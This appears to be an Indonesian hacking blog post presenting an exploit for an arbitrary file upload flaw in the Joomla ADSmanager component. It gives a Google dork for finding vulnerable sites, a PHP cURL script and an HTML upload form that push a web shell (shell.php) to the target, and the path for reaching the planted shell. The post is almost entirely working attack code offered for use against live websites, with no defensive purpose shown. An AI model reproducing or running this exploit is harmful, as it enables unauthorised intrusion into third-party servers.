Joomla ADSmanager Exploit Arbitrary File Upload Vulnerability

Simpan Postingan

Joomla ADSmanager Exploit Arbitrary File Upload Vulnerabilit

Dork : inurl:/index.php?option=com_adsmanager/ site:/uk/com/org

CODE PHP :

<?php

$url = “blabla.com/index.php?option=com_adsmanager&task=upload&tmpl=component”; // put URL Here

$post = array

(

“file” => “@shell.jpg”,

“name” => “shell.php”

);

$ch = curl_init (“$url“);

curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);

curl_setopt ($ch, CURLOPT_USERAGENT, “Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0″);

curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);

curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);

curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);

curl_setopt ($ch, CURLOPT_POST, 1);

@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);

$data = curl_exec ($ch);

curl_close ($ch);

echo $data;

?>

#CSRF :

<form method=”POST” action=”TARGET/index.php?option=com_adsmanager&task=upload&tmpl=component”

enctype=”multipart/form-data”>

<input type=”file” name=”files[]” /><button>Upload</button>

</form>

Acces Shell: site.com/tmp/plupload/shell.php

Dork Hacking Vuln website

September 05, 2015 • 0 komentar

Disclaimer: gambar, artikel ataupun video yang ada di web ini terkadang berasal dari berbagai sumber media lain. Hak Cipta sepenuhnya dipegang oleh sumber tersebut. Jika ada masalah terkait hal ini, Anda dapat menghubungi kami di halaman ini.